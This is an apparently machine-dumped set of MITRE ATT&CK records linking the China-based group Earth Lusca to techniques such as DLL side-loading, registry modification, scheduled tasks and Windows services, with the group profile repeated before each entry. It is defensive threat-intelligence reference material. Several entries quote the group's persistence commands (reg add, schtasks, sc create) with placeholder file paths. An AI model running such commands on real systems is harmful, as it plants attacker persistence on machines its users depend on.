x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--7e150503-88e7-4861-866b-ff1ac82c4475
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) employed a PowerShell script called RDPConnectionParser to read and filter the Windows event log “Microsoft-Windows-TerminalServices-RDPClient/Operational”
(Event ID 1024) to obtain network information from RDP connections. [Earth Lusca](https://attack.mitre.org/groups/G1006) has also used [netstat](https://attack.mitre.org/software/S0104) from a compromised system to obtain network connection information.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--def0dc1a-1c41-44f0-a076-36fb1b98390c
revoked : False
technique : System Network Connections Discovery
technique_description : Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. 

An adversary who gains access to a system that is part of a cloud-based environment may map out Virtual Private Clouds or Virtual Networks in order to determine what systems and services are connected. The actions performed are likely the same types of discovery techniques depending on the operating system, but the resulting information may include details about the networked cloud environment relevant to the adversary's goals. Cloud providers may have different ways in which their virtual networks operate.(Citation: Amazon AWS VPC Guide)(Citation: Microsoft Azure Virtual Network Overview)(Citation: Google VPC Overview) Similarly, adversaries who gain access to network devices may also perform similar discovery activities to gather information about connected systems and services.

Utilities and commands that acquire this information include [netstat](https://attack.mitre.org/software/S0104), "net use," and "net session" with [Net](https://attack.mitre.org/software/S0039). In Mac and Linux, [netstat](https://attack.mitre.org/software/S0104) and <code>lsof</code> can be used to list current connections. <code>who -a</code> and <code>w</code> can be used to show which users are currently logged in, similar to "net session". Additionally, built-in features native to network devices and [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) may be used (e.g. <code>show ip sockets</code>, <code>show tcp brief</code>).(Citation: US-CERT-TA18-106A)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='discovery')]
technique_id : T1049
matrix : mitre-attack
platform : ['Windows', 'IaaS', 'Linux', 'macOS', 'Network']
data_sources : ['Process: OS API Execution', 'Process: Process Creation', 'Command: Command Execution']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--e64c62cf-9cd7-4a14-94ec-cdaac43ab44b
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has placed a malicious payload in `%WINDIR%\SYSTEM32\oci.dll` so it would be sideloaded by the MSDTC service.(Citation: TrendMicro EarthLusca 2022) 
relationship_id : relationship--7807639f-cc9f-4b0a-9f01-8161cbb1fd53
revoked : False
technique : DLL Side-Loading
technique_description : Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).

Side-loading takes advantage of the DLL search order used by the loader by positioning both the victim application and malicious payload(s) alongside each other. Adversaries likely use side-loading as a means of masking actions they perform under a legitimate, trusted, and potentially elevated system or software process. Benign executables used to side-load payloads may not be flagged during delivery and/or execution. Adversary payloads may also be encrypted/packed or otherwise obfuscated until loaded into the memory of the trusted process.(Citation: FireEye DLL Side-Loading)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='persistence'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='privilege-escalation'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
technique_id : T1574.002
matrix : mitre-attack
platform : ['Windows']
data_sources : ['File: File Modification', 'Process: Process Creation', 'Module: Module Load', 'File: File Creation']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) modified the registry using the command <code>reg add “HKEY_CURRENT_USER\Environment” /v UserInitMprLogonScript /t REG_SZ /d “[file path]”</code> for persistence.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--83aedf08-e8eb-4c18-80c1-727ddb0f1d07
revoked : False
technique : Modify Registry
technique_description : Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.

Access to specific areas of the Registry depends on account permissions, some requiring administrator-level access. The built-in Windows command-line utility [Reg](https://attack.mitre.org/software/S0075) may be used for local or remote Registry modification. (Citation: Microsoft Reg) Other tools may also be used, such as a remote access tool, which may contain functionality to interact with the Registry through the Windows API.

Registry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via [Reg](https://attack.mitre.org/software/S0075) or other utilities using the Win32 API. (Citation: Microsoft Reghide NOV 2006) Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to maintain persistence. (Citation: TrendMicro POWELIKS AUG 2014) (Citation: SpectorOps Hiding Reg Jul 2017)

The Registry of a remote system may be modified to aid in execution of files as part of lateral movement. It requires the remote Registry service to be running on the target system. (Citation: Microsoft Remote) Often [Valid Accounts](https://attack.mitre.org/techniques/T1078) are required, along with access to the remote system's [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) for RPC communication.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
technique_id : T1112
matrix : mitre-attack
platform : ['Windows']
data_sources : ['Windows Registry: Windows Registry Key Modification', 'Process: OS API Execution', 'Network Traffic: Network Traffic Flow', 'Command: Command Execution', 'Windows Registry: Windows Registry Key Deletion', 'Windows Registry: Windows Registry Key Creation', 'Process: Process Creation']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) used the command <code>schtasks /Create /SC ONLOgon /TN WindowsUpdateCheck /TR “[file path]” /ru system</code> for persistence.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--6f1c0538-c9f4-49ad-b934-0714b50c1c45
revoked : False
technique : Scheduled Task/Job
technique_description : Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)

Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218), adversaries have also abused task scheduling to potentially mask one-time execution under a trusted system process.(Citation: ProofPoint Serpent)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='execution'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='persistence'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='privilege-escalation')]
technique_id : T1053
matrix : mitre-attack
platform : ['Windows', 'Linux', 'macOS', 'Containers']
data_sources : ['Scheduled Job: Scheduled Job Creation', 'File: File Creation', 'Process: Process Creation', 'Container: Container Creation', 'Command: Command Execution', 'File: File Modification']
permissions_required : ['Administrator', 'SYSTEM', 'User']
effective_permissions : ['SYSTEM', 'Administrator', 'User']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) created a service using the command <code>sc create “SysUpdate” binpath= “cmd /c start “[file path]””&&sc config “SysUpdate” start= auto&&net
start SysUpdate</code> for persistence.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--cd85a2d6-ebee-4ebd-9571-5cafcac15b05
revoked : False
technique : Windows Service
technique_description : Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.(Citation: TechNet Services) Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.

Adversaries may install a new service or modify an existing service to execute at startup in order to persist on a system. Service configurations can be set or modified using system utilities (such as sc.exe), by directly modifying the Registry, or by interacting directly with the Windows API. 

Adversaries may also use services to install and execute malicious drivers. For example, after dropping a driver file (ex: `.sys`) to disk, the payload can be loaded and registered via [Native API](https://attack.mitre.org/techniques/T1106) functions such as `CreateServiceW()` (or manually via functions such as `ZwLoadDriver()` and `ZwSetValueKey()`), by creating the required service Registry values (i.e. [Modify Registry](https://attack.mitre.org/techniques/T1112)), or by using command-line utilities such as `PnPUtil.exe`.(Citation: Symantec W.32 Stuxnet Dossier)(Citation: Crowdstrike DriveSlayer February 2022)(Citation: Unit42 AcidBox June 2020) Adversaries may leverage these drivers as [Rootkit](https://attack.mitre.org/techniques/T1014)s to hide the presence of malicious activity on a system. Adversaries may also load a signed yet vulnerable driver onto a compromised machine (known as "Bring Your Own Vulnerable Driver" (BYOVD)) as part of [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).(Citation: ESET InvisiMole June 2020)(Citation: Unit42 AcidBox June 2020)

Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges. Adversaries may also directly start services through [Service Execution](https://attack.mitre.org/techniques/T1569/002). To make detection analysis more challenging, malicious services may also incorporate [Masquerade Task or Service](https://attack.mitre.org/techniques/T1036/004) (ex: using a service and/or payload name related to a legitimate OS or benign software component).
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='persistence'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='privilege-escalation')]
technique_id : T1543.003
matrix : mitre-attack
platform : ['Windows']
data_sources : ['Windows Registry: Windows Registry Key Modification', 'Process: Process Creation', 'Network Traffic: Network Traffic Flow', 'Service: Service Creation', 'Command: Command Execution', 'File: File Metadata', 'Windows Registry: Windows Registry Key Creation', 'Driver: Driver Load', 'Service: Service Modification', 'Process: OS API Execution']
effective_permissions : ['Administrator', 'SYSTEM']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) used the command <code>ipconfig</code> to obtain information about network configurations.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--e13ab711-012c-4405-87ae-f096d770e367
revoked : False
technique : System Network Configuration Discovery
technique_description : Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include [Arp](https://attack.mitre.org/software/S0099), [ipconfig](https://attack.mitre.org/software/S0100)/[ifconfig](https://attack.mitre.org/software/S0101), [nbtstat](https://attack.mitre.org/software/S0102), and [route](https://attack.mitre.org/software/S0103).

Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather information about configurations and settings, such as IP addresses of configured interfaces and static/dynamic routes (e.g. <code>show ip route</code>, <code>show ip interface</code>).(Citation: US-CERT-TA18-106A)(Citation: Mandiant APT41 Global Intrusion )

Adversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016) during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next. 
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='discovery')]
technique_id : T1016
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows', 'Network']
data_sources : ['Command: Command Execution', 'Script: Script Execution', 'Process: Process Creation', 'Process: OS API Execution']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) collected information on user accounts via the <code>whoami</code> command.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--5fc9189b-7c9b-43f7-8d60-96a1f497e395
revoked : False
technique : System Owner/User Discovery
technique_description : Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Various utilities and commands may acquire this information, including <code>whoami</code>. In macOS and Linux, the currently logged in user can be identified with <code>w</code> and <code>who</code>. On macOS the <code>dscl . list /Users | grep -v '_'</code> command can also be used to enumerate user accounts. Environment variables, such as <code>%USERNAME%</code> and <code>$USER</code>, may also be used to access this information.

On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show users` and `show ssh` can be used to display users currently logged into the device.(Citation: show_ssh_users_cmd_cisco)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='discovery')]
technique_id : T1033
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows', 'Network']
data_sources : ['Active Directory: Active Directory Object Access', 'Process: OS API Execution', 'Command: Command Execution', 'Network Traffic: Network Traffic Content', 'Process: Process Creation', 'Network Traffic: Network Traffic Flow', 'Windows Registry: Windows Registry Key Access', 'File: File Access', 'Process: Process Access']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
